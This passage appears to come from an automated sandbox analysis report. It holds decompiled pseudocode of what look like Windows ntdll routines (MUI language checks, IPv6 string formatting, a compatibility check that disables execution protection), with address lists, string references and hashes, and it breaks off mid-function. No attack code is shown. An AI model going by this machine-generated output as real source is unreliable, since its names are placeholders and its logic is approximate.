							_t261 = E0200E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01FFE2A8(_t322,  &_v68, _t269);
							if(E02015553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                							_v40 = _t318;
                                                                                                                                                                							_v20 = _t318;
                                                                                                                                                                						}
                                                                                                                                                                						if(_v8 != _t318) {
                                                                                                                                                                							E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                						}
                                                                                                                                                                						_v8 = _t318;
                                                                                                                                                                						goto L30;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				_t284 = _v24;
                                                                                                                                                                				_t322 = _t284 + 4;
                                                                                                                                                                				_push(_t284);
                                                                                                                                                                				_v48 = _t322;
                                                                                                                                                                				E0201718A(_t284);
                                                                                                                                                                				_t339 = _t335 + 4;
                                                                                                                                                                				if(_t322 == _t318) {
                                                                                                                                                                					_v28 = _t318;
                                                                                                                                                                				} else {
                                                                                                                                                                					_v28 = E01FFE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                				}
                                                                                                                                                                				if(_v28 == _t318) {
                                                                                                                                                                					_v48 = _t318;
                                                                                                                                                                					goto L58;
                                                                                                                                                                				} else {
                                                                                                                                                                					E01FF2340(_v28, _v8, _v24);
                                                                                                                                                                					_v16 = _v28;
                                                                                                                                                                					_a4 = _t318;
                                                                                                                                                                					_t288 = E0200E679(_v28, _t332);
                                                                                                                                                                					_t335 = _t339 + 0x14;
                                                                                                                                                                					while(1) {
                                                                                                                                                                						_v12 = _t288;
                                                                                                                                                                						if(_t288 == _t318) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						_v12 = _v12 + 2;
                                                                                                                                                                						 *_v12 = 0;
                                                                                                                                                                						E01FFE2A8(_v12,  &_v68, _v16);
                                                                                                                                                                						if(E02015553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                							_a4 = _a4 + 1;
                                                                                                                                                                						}
                                                                                                                                                                						_v16 = _v12;
                                                                                                                                                                						_t288 = E0200E679(_v12, _t332);
                                                                                                                                                                						_pop(_t322);
                                                                                                                                                                					}
                                                                                                                                                                					_t296 = _v16;
                                                                                                                                                                					if( *_v16 != _t318) {
                                                                                                                                                                						E01FFE2A8(_t322,  &_v68, _t296);
                                                                                                                                                                						if(E02015553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                							_a4 = _a4 + 1;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					if(_a4 == _t318) {
                                                                                                                                                                						E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                						_v48 = _t318;
                                                                                                                                                                						_v28 = _t318;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v8 != _t318) {
                                                                                                                                                                						E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                					}
                                                                                                                                                                					_v8 = _t318;
                                                                                                                                                                					goto L17;
                                                                                                                                                                				}
                                                                                                                                                                			}





































                                                                                                                                                                0x02018af0
                                                                                                                                                                0x02018af4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018af4
                                                                                                                                                                0x02018a42
                                                                                                                                                                0x02018926
                                                                                                                                                                0x02018929
                                                                                                                                                                0x0201892c
                                                                                                                                                                0x0201892d
                                                                                                                                                                0x02018930
                                                                                                                                                                0x02018935
                                                                                                                                                                0x0201893a
                                                                                                                                                                0x02018b51
                                                                                                                                                                0x02018940
                                                                                                                                                                0x02018954
                                                                                                                                                                0x02018954
                                                                                                                                                                0x0201895a
                                                                                                                                                                0x02061b63
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018960
                                                                                                                                                                0x02018969
                                                                                                                                                                0x02018973
                                                                                                                                                                0x02018976
                                                                                                                                                                0x02018979
                                                                                                                                                                0x0201897e
                                                                                                                                                                0x02018981
                                                                                                                                                                0x02018981
                                                                                                                                                                0x02018986
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02061b6e
                                                                                                                                                                0x02061b74
                                                                                                                                                                0x02061b7b
                                                                                                                                                                0x02061b8f
                                                                                                                                                                0x02061b91
                                                                                                                                                                0x02061b91
                                                                                                                                                                0x02061b99
                                                                                                                                                                0x02061b9c
                                                                                                                                                                0x02061ba2
                                                                                                                                                                0x02061ba2
                                                                                                                                                                0x0201898c
                                                                                                                                                                0x02018992
                                                                                                                                                                0x02018999
                                                                                                                                                                0x020189ad
                                                                                                                                                                0x02061ba8
                                                                                                                                                                0x02061ba8
                                                                                                                                                                0x020189ad
                                                                                                                                                                0x020189b6
                                                                                                                                                                0x020189c8
                                                                                                                                                                0x020189cd
                                                                                                                                                                0x020189d0
                                                                                                                                                                0x020189d0
                                                                                                                                                                0x020189d6
                                                                                                                                                                0x020189e8
                                                                                                                                                                0x020189e8
                                                                                                                                                                0x020189ed
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020189ed
                                                                                                                                                                0x0201895a
                                                                                                                                                                0x0201883e
                                                                                                                                                                0x02018841
                                                                                                                                                                0x02018844
                                                                                                                                                                0x02018845
                                                                                                                                                                0x02018848
                                                                                                                                                                0x0201884d
                                                                                                                                                                0x02018852
                                                                                                                                                                0x02018b49
                                                                                                                                                                0x02018858
                                                                                                                                                                0x0201886c
                                                                                                                                                                0x0201886c
                                                                                                                                                                0x02018872
                                                                                                                                                                0x02061b0e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018878
                                                                                                                                                                0x02018881
                                                                                                                                                                0x0201888b
                                                                                                                                                                0x0201888e
                                                                                                                                                                0x02018891
                                                                                                                                                                0x02018896
                                                                                                                                                                0x02018899
                                                                                                                                                                0x02018899
                                                                                                                                                                0x0201889e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02061b21
                                                                                                                                                                0x02061b27
                                                                                                                                                                0x02061b2e
                                                                                                                                                                0x02061b42
                                                                                                                                                                0x02061b44
                                                                                                                                                                0x02061b44
                                                                                                                                                                0x02061b4c
                                                                                                                                                                0x02061b4f
                                                                                                                                                                0x02061b55
                                                                                                                                                                0x02061b55
                                                                                                                                                                0x020188a4
                                                                                                                                                                0x020188aa
                                                                                                                                                                0x020188b1
                                                                                                                                                                0x020188c5
                                                                                                                                                                0x02061b5b
                                                                                                                                                                0x02061b5b
                                                                                                                                                                0x020188c5
                                                                                                                                                                0x020188ce
                                                                                                                                                                0x020188e0
                                                                                                                                                                0x020188e5
                                                                                                                                                                0x020188e8
                                                                                                                                                                0x020188e8
                                                                                                                                                                0x020188ee
                                                                                                                                                                0x02018900
                                                                                                                                                                0x02018900
                                                                                                                                                                0x02018905
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018905

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 02018827
                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 020187E6
                                                                                                                                                                • WindowsExcludedProcs, xrefs: 020187C1
                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 020189FC
                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 02018914
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcspbrk
                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                • API String ID: 402402107-258546922
                                                                                                                                                                • Opcode ID: 48372931718602450f5f0fbb70d0f09df786f9d16b75ea052857f2a4f688e932
                                                                                                                                                                • Instruction ID: 9f261618ddccb74c189719419f25ed6a9980f9bf5420f505629e439cef81881b
                                                                                                                                                                • Opcode Fuzzy Hash: 48372931718602450f5f0fbb70d0f09df786f9d16b75ea052857f2a4f688e932
                                                                                                                                                                • Instruction Fuzzy Hash: D8F108B2D00209EFDF51DF94C9849EEBBF9FF08304F15846AE605A7221E7719A45EB50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                			E020313CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                				char _v8;
                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                				char _v24;
                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                				signed int _t78;
                                                                                                                                                                				signed int _t86;
                                                                                                                                                                				char _t90;
                                                                                                                                                                				signed int _t91;
                                                                                                                                                                				signed int _t96;
                                                                                                                                                                				intOrPtr _t108;
                                                                                                                                                                				signed int _t114;
                                                                                                                                                                				void* _t115;
                                                                                                                                                                				intOrPtr _t128;
                                                                                                                                                                				intOrPtr* _t129;
                                                                                                                                                                				void* _t130;
                                                                                                                                                                
                                                                                                                                                                				_t129 = _a4;
                                                                                                                                                                				_t128 = _a8;
                                                                                                                                                                				_t116 = 0;
                                                                                                                                                                				_t71 = _t128 + 0x5c;
                                                                                                                                                                				_v8 = 8;
                                                                                                                                                                				_v20 = _t71;
                                                                                                                                                                				if( *_t129 == 0) {
                                                                                                                                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                						goto L5;
                                                                                                                                                                					} else {
                                                                                                                                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                						if(_t96 != 0) {
                                                                                                                                                                							L38:
                                                                                                                                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                								goto L5;
                                                                                                                                                                							} else {
                                                                                                                                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                								_t86 = E02027707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                								L36:
                                                                                                                                                                								return _t128 + _t86 * 2;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                						if(_t114 == 0) {
                                                                                                                                                                							L33:
                                                                                                                                                                							_t115 = 0x1ff2926;
                                                                                                                                                                							L35:
                                                                                                                                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                							_t86 = E02027707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                							goto L36;
                                                                                                                                                                						}
                                                                                                                                                                						if(_t114 != 0xffff) {
                                                                                                                                                                							_t116 = 0;
                                                                                                                                                                							goto L38;
                                                                                                                                                                						}
                                                                                                                                                                						if(_t114 != 0) {
                                                                                                                                                                							_t115 = 0x1ff9cac;
                                                                                                                                                                							goto L35;
                                                                                                                                                                						}
                                                                                                                                                                						goto L33;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					L5:
                                                                                                                                                                					_a8 = _t116;
                                                                                                                                                                					_a4 = _t116;
                                                                                                                                                                					_v12 = _t116;
                                                                                                                                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                							_v8 = 6;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_t90 = _v8;
                                                                                                                                                                					if(_t90 <= _t116) {
                                                                                                                                                                						L11:
                                                                                                                                                                						if(_a8 - _a4 <= 1) {
                                                                                                                                                                							_a8 = _t116;
                                                                                                                                                                							_a4 = _t116;
                                                                                                                                                                						}
                                                                                                                                                                						_t91 = 0;
                                                                                                                                                                						if(_v8 <= _t116) {
                                                                                                                                                                							L22:
                                                                                                                                                                							if(_v8 < 8) {
                                                                                                                                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                								_t128 = _t128 + E02027707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                							}
                                                                                                                                                                							return _t128;
                                                                                                                                                                						} else {
                                                                                                                                                                							L14:
                                                                                                                                                                							L14:
                                                                                                                                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                									_push(":");
                                                                                                                                                                									_push(_t71 - _t128 >> 1);
                                                                                                                                                                									_push(_t128);
                                                                                                                                                                									_t128 = _t128 + E02027707() * 2;
                                                                                                                                                                									_t71 = _v20;
                                                                                                                                                                									_t130 = _t130 + 0xc;
                                                                                                                                                                								}
                                                                                                                                                                								_t78 = E02027707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                								_t130 = _t130 + 0x10;
                                                                                                                                                                							} else {
                                                                                                                                                                								_push(L"::");
                                                                                                                                                                								_push(_t71 - _t128 >> 1);
                                                                                                                                                                								_push(_t128);
                                                                                                                                                                								_t78 = E02027707();
                                                                                                                                                                								_t130 = _t130 + 0xc;
                                                                                                                                                                								_t91 = _a8 - 1;
                                                                                                                                                                							}
                                                                                                                                                                							_t91 = _t91 + 1;
                                                                                                                                                                							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                							_t71 = _v20;
                                                                                                                                                                							if(_t91 >= _v8) {
                                                                                                                                                                								goto L22;
                                                                                                                                                                							}
                                                                                                                                                                							_t116 = 0;
                                                                                                                                                                							goto L14;
                                                                                                                                                                						}
                                                                                                                                                                					} else {
                                                                                                                                                                						_t108 = 1;
                                                                                                                                                                						_v16 = _t129;
                                                                                                                                                                						_v24 = _t90;
                                                                                                                                                                						do {
                                                                                                                                                                							if( *_v16 == _t116) {
                                                                                                                                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                									_a4 = _v12;
                                                                                                                                                                									_a8 = _t108;
                                                                                                                                                                								}
                                                                                                                                                                								_t116 = 0;
                                                                                                                                                                							} else {
                                                                                                                                                                								_v12 = _t108;
                                                                                                                                                                							}
                                                                                                                                                                							_v16 = _v16 + 2;
                                                                                                                                                                							_t108 = _t108 + 1;
                                                                                                                                                                							_t26 =  &_v24;
                                                                                                                                                                							 *_t26 = _v24 - 1;
                                                                                                                                                                						} while ( *_t26 != 0);
                                                                                                                                                                						goto L11;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                			}




















                                                                                                                                                                0x0205ea05
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02031449
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02031449
                                                                                                                                                                0x0203144c
                                                                                                                                                                0x02031459
                                                                                                                                                                0x02031462
                                                                                                                                                                0x02031469
                                                                                                                                                                0x0203146a
                                                                                                                                                                0x02031470
                                                                                                                                                                0x02031473
                                                                                                                                                                0x02031476
                                                                                                                                                                0x02031476
                                                                                                                                                                0x02031490
                                                                                                                                                                0x02031495
                                                                                                                                                                0x0203138e
                                                                                                                                                                0x02031390
                                                                                                                                                                0x02031397
                                                                                                                                                                0x02031398
                                                                                                                                                                0x02031399
                                                                                                                                                                0x020313a1
                                                                                                                                                                0x020313a4
                                                                                                                                                                0x020313a4
                                                                                                                                                                0x02031498
                                                                                                                                                                0x0203149c
                                                                                                                                                                0x0203149f
                                                                                                                                                                0x020314a2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020314a4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020314a4
                                                                                                                                                                0x02031413
                                                                                                                                                                0x02031415
                                                                                                                                                                0x02031416
                                                                                                                                                                0x02031419
                                                                                                                                                                0x0203141c
                                                                                                                                                                0x02031422
                                                                                                                                                                0x020313b7
                                                                                                                                                                0x020313bc
                                                                                                                                                                0x020313bf
                                                                                                                                                                0x020313bf
                                                                                                                                                                0x020313c2
                                                                                                                                                                0x02031424
                                                                                                                                                                0x02031424
                                                                                                                                                                0x02031424
                                                                                                                                                                0x02031427
                                                                                                                                                                0x0203142b
                                                                                                                                                                0x0203142c
                                                                                                                                                                0x0203142c
                                                                                                                                                                0x0203142c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0203141c
                                                                                                                                                                0x02031411

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                • Opcode ID: ddc4cbdd55535202caef8e35471ad367e53d3d41305b3b338e5b48f9fe0d96c9
                                                                                                                                                                • Instruction ID: 87fa7e8ee5bbaaae0a78af67f0eee00dc6cf724263fec4c2ac1d494c170d9fae
                                                                                                                                                                • Opcode Fuzzy Hash: ddc4cbdd55535202caef8e35471ad367e53d3d41305b3b338e5b48f9fe0d96c9
                                                                                                                                                                • Instruction Fuzzy Hash: 91610471D04756AACF26CF59C8909BFFBFAEF88314714C02EE5DA46540D375A640EB60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E02027EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				char _v540;
                                                                                                                                                                				unsigned int _v544;
                                                                                                                                                                				signed int _v548;
                                                                                                                                                                				intOrPtr _v552;
                                                                                                                                                                				char _v556;
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int _t33;
                                                                                                                                                                				void* _t38;
                                                                                                                                                                				unsigned int _t46;
                                                                                                                                                                				unsigned int _t47;
                                                                                                                                                                				unsigned int _t52;
                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                				unsigned int _t62;
                                                                                                                                                                				void* _t69;
                                                                                                                                                                				void* _t70;
                                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                                				signed int _t73;
                                                                                                                                                                				void* _t74;
                                                                                                                                                                				void* _t75;
                                                                                                                                                                				void* _t76;
                                                                                                                                                                				void* _t77;
                                                                                                                                                                
                                                                                                                                                                				_t33 =  *0x20d2088; // 0x776bdffd
                                                                                                                                                                				_v8 = _t33 ^ _t73;
                                                                                                                                                                				_v548 = _v548 & 0x00000000;
                                                                                                                                                                				_t72 = _a4;
                                                                                                                                                                				if(E02027F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                					__eflags = _v548;
                                                                                                                                                                					if(_v548 == 0) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					_t62 = _t72 + 0x24;
                                                                                                                                                                					E02043F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                					_t71 = 0x214;
                                                                                                                                                                					_v544 = 0x214;
                                                                                                                                                                					E01FFDFC0( &_v540, 0, 0x214);
                                                                                                                                                                					_t75 = _t74 + 0x20;
                                                                                                                                                                					_t46 =  *0x20d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                					__eflags = _t46;
                                                                                                                                                                					if(_t46 == 0) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					_t47 = _v544;
                                                                                                                                                                					__eflags = _t47;
                                                                                                                                                                					if(_t47 == 0) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					__eflags = _t47 - 0x214;
                                                                                                                                                                					if(_t47 >= 0x214) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					_push(_t62);
                                                                                                                                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                					E02043F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                					_t52 = E02000D27( &_v540, L"Execute=1");
                                                                                                                                                                					_t76 = _t75 + 0x1c;
                                                                                                                                                                					_push(_t62);
                                                                                                                                                                					__eflags = _t52;
                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                						E02043F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                						_t71 =  &_v540;
                                                                                                                                                                						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                						_t77 = _t76 + 0x14;
                                                                                                                                                                						_v552 = _t56;
                                                                                                                                                                						__eflags = _t71 - _t56;
                                                                                                                                                                						if(_t71 >= _t56) {
                                                                                                                                                                							goto L1;
                                                                                                                                                                						} else {
                                                                                                                                                                							goto L10;
                                                                                                                                                                						}
                                                                                                                                                                						while(1) {
                                                                                                                                                                							L10:
                                                                                                                                                                							_t62 = E02008375(_t71, 0x20);
                                                                                                                                                                							_pop(_t69);
                                                                                                                                                                							__eflags = _t62;
                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                								 *_t62 = 0;
                                                                                                                                                                							}
                                                                                                                                                                							E02043F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                							_t77 = _t77 + 0x10;
                                                                                                                                                                							E0206E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                							__eflags = _t62;
                                                                                                                                                                							if(_t62 == 0) {
                                                                                                                                                                								goto L1;
                                                                                                                                                                							}
                                                                                                                                                                							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                							_t71 = _t31;
                                                                                                                                                                							__eflags = _t71 - _v552;
                                                                                                                                                                							if(_t71 >= _v552) {
                                                                                                                                                                								goto L1;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                					_push(3);
                                                                                                                                                                					_push(0x55);
                                                                                                                                                                					E02043F92();
                                                                                                                                                                					_t38 = 1;
                                                                                                                                                                					L2:
                                                                                                                                                                					return E01FFE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                				}
                                                                                                                                                                				L1:
                                                                                                                                                                				_t38 = 0;
                                                                                                                                                                				goto L2;
                                                                                                                                                                			}




























                                                                                                                                                                APIs
                                                                                                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02043F12
                                                                                                                                                                Strings
                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0204E345
                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02043F75
                                                                                                                                                                • ExecuteOptions, xrefs: 02043F04
                                                                                                                                                                • Execute=1, xrefs: 02043F5E
                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0204E2FB
                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02043F4A
                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02043EC4
                                                                                                                                                                • x';, xrefs: 02027F1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BaseDataModuleQuery
                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$x';
                                                                                                                                                                • API String ID: 3901378454-2393672245
                                                                                                                                                                • Opcode ID: cc32a60b4732596e62381f10f7eaa8960b9339e0adb7c8d0d67bac7d06df11fc
                                                                                                                                                                • Instruction ID: 3bcd46d1d6cd5819e31e0b058cfcc8e7136c0d905b828242005822b866b1be6d
                                                                                                                                                                • Opcode Fuzzy Hash: cc32a60b4732596e62381f10f7eaa8960b9339e0adb7c8d0d67bac7d06df11fc
                                                                                                                                                                • Instruction Fuzzy Hash: 5741F87268031D7ADB21DA94DCC9FEAB3BCAF14704F0005EEA605E6090EB71DA459F60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E02030B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				signed int _v12;
                                                                                                                                                                				signed int _v16;
                                                                                                                                                                				signed int _v20;
                                                                                                                                                                				signed int _v24;
                                                                                                                                                                				signed int _v28;
                                                                                                                                                                				signed int _v32;
                                                                                                                                                                				void* _t108;
                                                                                                                                                                				void* _t116;
                                                                                                                                                                				char _t120;
                                                                                                                                                                				short _t121;
                                                                                                                                                                				void* _t128;
                                                                                                                                                                				intOrPtr* _t130;
                                                                                                                                                                				char _t132;
                                                                                                                                                                				short _t133;
                                                                                                                                                                				intOrPtr _t141;
                                                                                                                                                                				signed int _t156;
                                                                                                                                                                				signed int _t174;
                                                                                                                                                                				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
